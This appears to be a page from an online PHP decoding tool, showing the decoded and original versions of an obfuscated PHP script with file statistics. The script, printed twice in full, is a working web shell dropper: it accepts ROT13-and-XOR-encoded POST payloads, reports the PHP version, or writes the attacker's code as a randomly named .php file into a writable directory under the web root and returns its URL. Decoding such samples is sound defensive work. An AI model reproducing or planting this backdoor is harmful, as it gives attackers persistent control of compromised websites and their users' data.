Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $zhvljspyx = "ryxhopbktjtkpxat"; $mpiwspocmt = "";foreach ($_POST as $ihttkiq..

Decoded Output download

<?php  
		$zhvljspyx = "ryxhopbktjtkpxat"; 
		$mpiwspocmt = "";foreach ($_POST as $ihttkiqdom => $gajicshna){if (strlen($ihttkiqdom) == 16 and substr_count($gajicshna, "%") > 10){owxan($ihttkiqdom, $gajicshna);}}function owxan($ihttkiqdom, $bawgndaigq){global $mpiwspocmt;$mpiwspocmt = $ihttkiqdom;$bawgndaigq = str_split(rawurldecode(str_rot13($bawgndaigq))); 
			 
			function sdqakem($flgifqciw, $ihttkiqdom){ 
				global $zhvljspyx, $mpiwspocmt; 
				return $flgifqciw ^ $zhvljspyx[$ihttkiqdom % strlen($zhvljspyx)] ^ $mpiwspocmt[$ihttkiqdom % strlen($mpiwspocmt)]; 
				} 
			$bawgndaigq = implode("", array_map("sdqakem", array_values($bawgndaigq), array_keys($bawgndaigq))); 
			$bawgndaigq = @unserialize($bawgndaigq); 
			if (@is_array($bawgndaigq)) 
				{ 
				$ihttkiqdom = array_keys($bawgndaigq); 
				$bawgndaigq = $bawgndaigq[$ihttkiqdom[0]]; 
				if ($bawgndaigq === $ihttkiqdom[0]){ 
					echo @serialize(Array('php' => @phpversion(), )); 
					exit(); 
				}else{ 
					function hxgsjxu($eeskixeir) { 
						static $oqeggxtjy = array(); 
						$gkuhe = glob($eeskixeir . '/*', GLOB_ONLYDIR);if (count($gkuhe) > 0) {foreach ($gkuhe as $eeskixe){if (@is_writable($eeskixe)){$oqeggxtjy[] = $eeskixe;}}}foreach ($gkuhe as $eeskixeir) hxgsjxu($eeskixeir);return $oqeggxtjy;}$tvbds = $_SERVER["DOCUMENT_ROOT"];$gkuhe = hxgsjxu($tvbds);$ihttkiqdom = array_rand($gkuhe);$eeskixemmgiv = $gkuhe[$ihttkiqdom] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($eeskixemmgiv, $bawgndaigq);echo "http://" . $_SERVER["HTTP_HOST"] . substr($eeskixemmgiv, strlen($tvbds));exit();}}} ?>

Did this file decode correctly?

Original Code

<?php 
		$zhvljspyx = "ryxhopbktjtkpxat";
		$mpiwspocmt = "";foreach ($_POST as $ihttkiqdom => $gajicshna){if (strlen($ihttkiqdom) == 16 and substr_count($gajicshna, "%") > 10){owxan($ihttkiqdom, $gajicshna);}}function owxan($ihttkiqdom, $bawgndaigq){global $mpiwspocmt;$mpiwspocmt = $ihttkiqdom;$bawgndaigq = str_split(rawurldecode(str_rot13($bawgndaigq)));
			
			function sdqakem($flgifqciw, $ihttkiqdom){
				global $zhvljspyx, $mpiwspocmt;
				return $flgifqciw ^ $zhvljspyx[$ihttkiqdom % strlen($zhvljspyx)] ^ $mpiwspocmt[$ihttkiqdom % strlen($mpiwspocmt)];
				}
			$bawgndaigq = implode("", array_map("sdqakem", array_values($bawgndaigq), array_keys($bawgndaigq)));
			$bawgndaigq = @unserialize($bawgndaigq);
			if (@is_array($bawgndaigq))
				{
				$ihttkiqdom = array_keys($bawgndaigq);
				$bawgndaigq = $bawgndaigq[$ihttkiqdom[0]];
				if ($bawgndaigq === $ihttkiqdom[0]){
					echo @serialize(Array('php' => @phpversion(), ));
					exit();
				}else{
					function hxgsjxu($eeskixeir) {
						static $oqeggxtjy = array();
						$gkuhe = glob($eeskixeir . '/*', GLOB_ONLYDIR);if (count($gkuhe) > 0) {foreach ($gkuhe as $eeskixe){if (@is_writable($eeskixe)){$oqeggxtjy[] = $eeskixe;}}}foreach ($gkuhe as $eeskixeir) hxgsjxu($eeskixeir);return $oqeggxtjy;}$tvbds = $_SERVER["DOCUMENT_ROOT"];$gkuhe = hxgsjxu($tvbds);$ihttkiqdom = array_rand($gkuhe);$eeskixemmgiv = $gkuhe[$ihttkiqdom] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($eeskixemmgiv, $bawgndaigq);echo "http://" . $_SERVER["HTTP_HOST"] . substr($eeskixemmgiv, strlen($tvbds));exit();}}}

Function Calls

None

Variables

$zhvljspyx ryxhopbktjtkpxat
$mpiwspocmt

Stats

MD5 49d4ff210ba72b7d8357a05c8267e30f
Eval Count 0
Decode Time 94 ms